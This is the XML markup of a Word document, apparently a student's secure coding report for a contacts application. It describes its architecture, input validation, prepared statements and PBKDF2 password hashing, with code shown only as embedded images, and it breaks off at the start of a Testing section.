    <w:p w14:paraId="0446F54A" w14:textId="77777777" w:rsidR="00FE1E78" w:rsidRDefault="00FE1E78" w:rsidP="00FE1E78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="313CD9E5" w14:textId="77777777" w:rsidR="00FE1E78" w:rsidRPr="00B54076" w:rsidRDefault="00270FC4" w:rsidP="00E508C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Security Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7167E415" w14:textId="62DB4345" w:rsidR="00300EDA" w:rsidRPr="00CF79C6" w:rsidRDefault="00CF79C6" w:rsidP="00BF4706">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF79C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I’ve</w:t>
      </w:r>
      <w:r w:rsidR="00300EDA" w:rsidRPr="00CF79C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> chosen this structure because it best suits my application. It has a presentation layer – for the users, a business logical layer for all the methods and exceptions used throughout, with a data access management layer for the database that connects with the rest of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B362E5" w14:textId="11C4FCD4" w:rsidR="00FE1E78" w:rsidRDefault="00926006" w:rsidP="00FE1E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D241A5F" wp14:editId="46C3332F">
            <wp:extent cx="5731510" cy="45288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28820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B947685" w14:textId="77777777" w:rsidR="00926006" w:rsidRDefault="00926006" w:rsidP="00FE1E78"/>
    <w:p w14:paraId="37E5DBBC" w14:textId="77777777" w:rsidR="00FE1E78" w:rsidRPr="00E85330" w:rsidRDefault="007F1545" w:rsidP="00E508C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Secure Coding Principals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082B8E8C" w14:textId="4EEC6211" w:rsidR="00097DAC" w:rsidRDefault="00133257" w:rsidP="00951010">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097DAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">Describing the project source code </w:t>
      </w:r>
      <w:r w:rsidR="007F1545" w:rsidRPr="00097DAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>includes</w:t>
      </w:r>
      <w:r w:rsidR="007F1545">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> secure coding </w:t>
      </w:r>
      <w:r w:rsidR="00097DAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>source code and</w:t>
      </w:r>
      <w:r w:rsidRPr="00097DAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F1545" w:rsidRPr="00097DAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>screenshots</w:t>
      </w:r>
      <w:r w:rsidR="007F1545">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B04BC" w14:textId="3CA6E3DF" w:rsidR="002026CC" w:rsidRPr="002026CC" w:rsidRDefault="002026CC" w:rsidP="002026CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002026CC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
        </w:rPr>
        <w:t>Password management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A23DF" w14:textId="41D1673E" w:rsidR="001F7A63" w:rsidRDefault="001F7A63" w:rsidP="00951010">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009005B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Created method ‘verifData’ to verify the data fields aren’t empty. Then called this in the next image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19727DC2" w14:textId="2C706EE4" w:rsidR="0041260F" w:rsidRPr="009005B4" w:rsidRDefault="0041260F" w:rsidP="00951010">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The method runs through the fields of the </w:t>
      </w:r>
      <w:r w:rsidR="003B6C16">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">GUI and checks that if they’re equal to </w:t>
      </w:r>
      <w:r w:rsidR="003908EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>null, if they are there is a prompt message for the user to enter details into the fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A083CC5" w14:textId="35808CB8" w:rsidR="00097DAC" w:rsidRDefault="001F7A63" w:rsidP="00FE1E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D804343" wp14:editId="0B9F8986">
            <wp:extent cx="4297680" cy="26526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2408" cy="2655519"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA339ED" w14:textId="571C4988" w:rsidR="001F7A63" w:rsidRDefault="001F7A63" w:rsidP="00FE1E78">
      <w:r>
        <w:t xml:space="preserve">Calling verifData and making sure </w:t>
      </w:r>
      <w:r w:rsidR="009005B4">
        <w:t>everything’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filled in, before connecting to database to insert information into selected fields of the prepared statement. This below image also checks for usernames that already exist</w:t>
      </w:r>
      <w:r w:rsidR="009005B4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A319C1" w14:textId="480BE760" w:rsidR="001F7A63" w:rsidRDefault="001F7A63" w:rsidP="00FE1E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="754A3A2D" wp14:editId="625DFABB">
            <wp:extent cx="3569523"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2792" cy="2730458"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEFCB73" w14:textId="77777777" w:rsidR="009005B4" w:rsidRDefault="009005B4" w:rsidP="00FE1E78"/>
    <w:p w14:paraId="490CB142" w14:textId="2F231DC3" w:rsidR="009005B4" w:rsidRDefault="009005B4" w:rsidP="00FE1E78">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The below image is the login</w:t>
      </w:r>
      <w:r w:rsidR="002026CC">
        <w:t xml:space="preserve">. The login button is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002026CC">
        <w:t>pressed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002026CC">
        <w:t xml:space="preserve"> and it selects the username, pic and id from the database where it matches the username and password. The if statement gets the current user ID from the database and then brings the user to the myContactsForm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EA26C" w14:textId="0B2A589D" w:rsidR="009005B4" w:rsidRDefault="009005B4" w:rsidP="00FE1E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63563CDA" wp14:editId="78F2EC08">
            <wp:extent cx="4686300" cy="324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900"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4695988" cy="3252996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7296331C" w14:textId="4A67FA49" w:rsidR="002026CC" w:rsidRDefault="002026CC" w:rsidP="002026CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002026CC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Input Validation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F99000" w14:textId="205AA6DA" w:rsidR="002026CC" w:rsidRPr="002026CC" w:rsidRDefault="002026CC" w:rsidP="002026CC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Login form below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410CBCA2" w14:textId="061CC5DF" w:rsidR="002026CC" w:rsidRPr="002026CC" w:rsidRDefault="002026CC" w:rsidP="002026CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18DFB975" wp14:editId="463DC2D3">
            <wp:extent cx="5731510" cy="2305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05050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3488C14A" w14:textId="7D6C0686" w:rsidR="002026CC" w:rsidRDefault="002026CC" w:rsidP="00FE1E78"/>
    <w:p w14:paraId="3443504C" w14:textId="156C32C7" w:rsidR="002026CC" w:rsidRDefault="002026CC" w:rsidP="00FE1E78"/>
    <w:p w14:paraId="72E4B47D" w14:textId="705AF246" w:rsidR="002026CC" w:rsidRDefault="002026CC" w:rsidP="00FE1E78"/>
    <w:p w14:paraId="6C0D5246" w14:textId="77777777" w:rsidR="003908EF" w:rsidRDefault="003908EF" w:rsidP="00FE1E78"/>
    <w:p w14:paraId="01760EBE" w14:textId="4E377A3A" w:rsidR="002026CC" w:rsidRPr="002026CC" w:rsidRDefault="002026CC" w:rsidP="00FE1E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002026CC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Signup Form below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AF5212" w14:textId="58970431" w:rsidR="002026CC" w:rsidRDefault="002026CC" w:rsidP="00FE1E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76AFBC41" wp14:editId="3B34185A">
            <wp:extent cx="5731510" cy="41001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00195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A1E043" w14:textId="495D620C" w:rsidR="004D3585" w:rsidRDefault="002026CC" w:rsidP="00FE1E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002026CC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MyContactsForm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E873BA1" w14:textId="784BF26C" w:rsidR="003908EF" w:rsidRPr="003908EF" w:rsidRDefault="003908EF" w:rsidP="00FE1E78">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003908EF">
        <w:t>Verif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003908EF">
        <w:t xml:space="preserve"> data in the MyContactsForm.  Checks the </w:t>
      </w:r>
      <w:r>
        <w:t>fields are filled out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8729E2" w14:textId="202C0116" w:rsidR="002026CC" w:rsidRDefault="002026CC" w:rsidP="00FE1E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04D44E80" wp14:editId="60DA17F4">
            <wp:extent cx="5006340" cy="280934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906" cy="2815270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53326097" w14:textId="4EB05227" w:rsidR="000C7442" w:rsidRDefault="000C7442" w:rsidP="00FE1E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D4C7F14" w14:textId="5AB40518" w:rsidR="000C7442" w:rsidRDefault="000C7442" w:rsidP="00FE1E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473459F6" w14:textId="7E8A13AC" w:rsidR="000C7442" w:rsidRDefault="000C7442" w:rsidP="00FE1E78">
      <w:r w:rsidRPr="004D3585">
        <w:t>Below checks that there is an image and other fields are filled in before it adds to the database</w:t>
      </w:r>
      <w:r w:rsidR="004D7071">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12219BA2" w14:textId="3D463DD0" w:rsidR="004D7071" w:rsidRPr="004D3585" w:rsidRDefault="004D7071" w:rsidP="00FE1E78">
      <w:r>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidR="00636722">
        <w:t>image =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> null, check the path and get images – it’ll prompt a message to say u need a profile picture before </w:t>
      </w:r>
      <w:r w:rsidR="00636722">
        <w:t>continuing</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC9B7A5" w14:textId="4ABE1A52" w:rsidR="000C7442" w:rsidRDefault="000C7442" w:rsidP="00FE1E78">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19B25453" wp14:editId="6A0D6D6E">
            <wp:extent cx="5731510" cy="3105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5150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC876B6" w14:textId="025F819B" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FBD6A0" w14:textId="109781B1" w:rsidR="00636722" w:rsidRPr="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Login Form - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECF2D78" w14:textId="1F572E9B" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48BE4619" wp14:editId="64460815">
            <wp:extent cx="4343400" cy="184592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8803" cy="1852466"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA3B8D6" w14:textId="197C3187" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Signup Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB27FFE" w14:textId="7BB95DEC" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F878046" wp14:editId="15706D01">
            <wp:extent cx="4895828" cy="15773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4177" cy="1580030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11551987" w14:textId="6915C210" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00636722">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The code below is the main code for the cryptography. The file contains variables that link with the other 2 pages and they hash and salt the passwords </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00636722">
        <w:t>entered into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00636722">
        <w:t xml:space="preserve"> the login field</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C2CCD6" w14:textId="7C563307" w:rsidR="00636722" w:rsidRPr="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Uses  PBKFB</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2 with sha1 hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F2DDF" w14:textId="6616A81D" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00636722">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3C4072" wp14:editId="0FE0BBF7">
            <wp:extent cx="5731510" cy="55359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535930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAA6E56" w14:textId="79CF47EC" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20072FAF" w14:textId="4EBD054B" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4480FB57" w14:textId="2337246E" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157D520D" w14:textId="03C17825" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302AD87E" w14:textId="76C02453" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443E7A17" w14:textId="2BDE9A99" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DDBC0C" w14:textId="7683D160" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0458D8" w14:textId="53D131CE" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7095C9" w14:textId="492F13B7" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E142933" w14:textId="567D5B93" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222EEC46" w14:textId="7D2AF30C" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73BB0758" w14:textId="77777777" w:rsidR="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367DD2CB" w14:textId="77777777" w:rsidR="00636722" w:rsidRPr="00636722" w:rsidRDefault="00636722" w:rsidP="00636722">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7927EB70" w14:textId="77777777" w:rsidR="00FE1E78" w:rsidRPr="00023439" w:rsidRDefault="00023439" w:rsidP="00E508C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B801CCE" w14:textId="3548739B" w:rsidR="00023439" w:rsidRDefault="00023439" w:rsidP="00023439">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Describing how project was tested</w:t>
      </w:r>
      <w:r w:rsidRPr="00023439">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> It should </w:t>
      </w:r>
      <w:r w:rsidRPr="00023439">
